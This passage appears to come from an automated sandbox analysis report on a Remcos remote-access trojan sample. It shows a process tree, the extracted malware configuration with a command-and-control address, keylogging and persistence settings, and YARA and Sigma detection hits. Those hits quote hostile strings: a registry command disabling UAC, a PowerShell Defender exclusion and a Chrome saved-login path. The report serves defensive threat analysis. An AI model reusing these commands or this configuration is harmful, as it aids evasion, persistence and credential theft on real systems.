            • chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1668,i,10836949039064754798,10619019416050471488,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 5848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,17733880235770984801,5447189613793920795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 5664 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 6500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=852 --field-trial-handle=1972,i,16836352753448976889,2601815521256357393,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 2192 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1884,i,7301673669103937254,12836756404783810427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 6524 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 5628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6348 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1940,i,12539128067224901217,8991374413711119156,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 8456 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2000,i,15628247129644466505,3875143643089187018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 6624 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 3332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1924,i,6482886242108065281,4105261451375631266,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 7708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2012,i,2947015941692405239,17280289242752989468,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9900 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 6672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1972,i,17200434405895777880,14925594255065276775,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1600 --field-trial-handle=1980,i,13945759412545287249,4073186008645904870,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9752 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 6448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1984,i,120110399101443424,9941541229011483260,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 10268 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1988,i,15807299402186397352,10536807858062258795,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 10528 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 10592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1442060403194708727,17590615368937411025,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 10912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 11088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,14774167980353239420,17590433410553186815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 11168 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 11232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 --field-trial-handle=1964,i,9634848512687327071,160386830931210519,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 10676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1992,i,15123479563739650555,17542146906633038749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 3660 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 2120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=2032,i,2098739127948043686,10317841462462024608,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 9244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,8929845415192330188,781615668034862370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 10040 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 11396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 11580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1960,i,9677392010693155346,11350815433485431755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 11700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 11892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1968,i,10908976342037239078,6657148638705883583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 11904 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 12044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 12224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,15324472771725808384,11056097287078458784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 1628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,1428648053043398560,3532581574471474972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 9240 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • chrome.exe (PID: 11684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 10208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,3981841079913460613,3962020599342444513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 11688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • WerFault.exe (PID: 7540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 1276 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1372 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["185.234.72.215:4444:0"], "Assigned name": "Graias", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "graias.exe", "Startup value": "Enable", "Hide file": "Enable", "Mutex": "Rmc-O844B9", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Graias", "Keylog folder": "graias", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\graias\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.4XYAW8PbZH.exe.4425c30.4.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            0.2.4XYAW8PbZH.exe.4425c30.4.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              0.2.4XYAW8PbZH.exe.4425c30.4.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.4XYAW8PbZH.exe.4425c30.4.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x69ef8:$a1: Remcos restarted by watchdog!
                • 0x6a470:$a3: %02i:%02i:%02i:%03i
                0.2.4XYAW8PbZH.exe.4425c30.4.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64194:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64110:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64110:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x64c10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64204:$str_b2: Executing file:
                • 0x6503c:$str_b3: GetDirectListeningPort
                • 0x64a00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x64b80:$str_b7: \update.vbs
                • 0x6422c:$str_b9: Downloaded file:
                • 0x64218:$str_b10: Downloading file:
                • 0x642bc:$str_b12: Failed to upload file:
                • 0x65004:$str_b13: StartForward
                • 0x65024:$str_b14: StopForward
                • 0x64ad8:$str_b15: fso.DeleteFile "
                • 0x64a6c:$str_b16: On Error Resume Next
                • 0x64b08:$str_b17: fso.DeleteFolder "
                • 0x642ac:$str_b18: Uploaded file:
                • 0x6426c:$str_b19: Unable to delete:
                • 0x64aa0:$str_b20: while fso.FileExists("
                • 0x64749:$str_c0: [Firefox StoredLogins not found]
                Click to see the 29 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Potentially Suspicious Malware Callback Communication
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.234.72.215, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\AppData\Roaming\Graias\graias.exe, Initiated: true, ProcessId: 7328, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\4XYAW8PbZH.exe", ParentImage: C:\Users\user\Desktop\4XYAW8PbZH.exe, ParentProcessId: 6976, ParentProcessName: 4XYAW8PbZH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe", ProcessId: 2536, ProcessName: powershell.exe
                Sigma detected: Suspect Svchost Activity
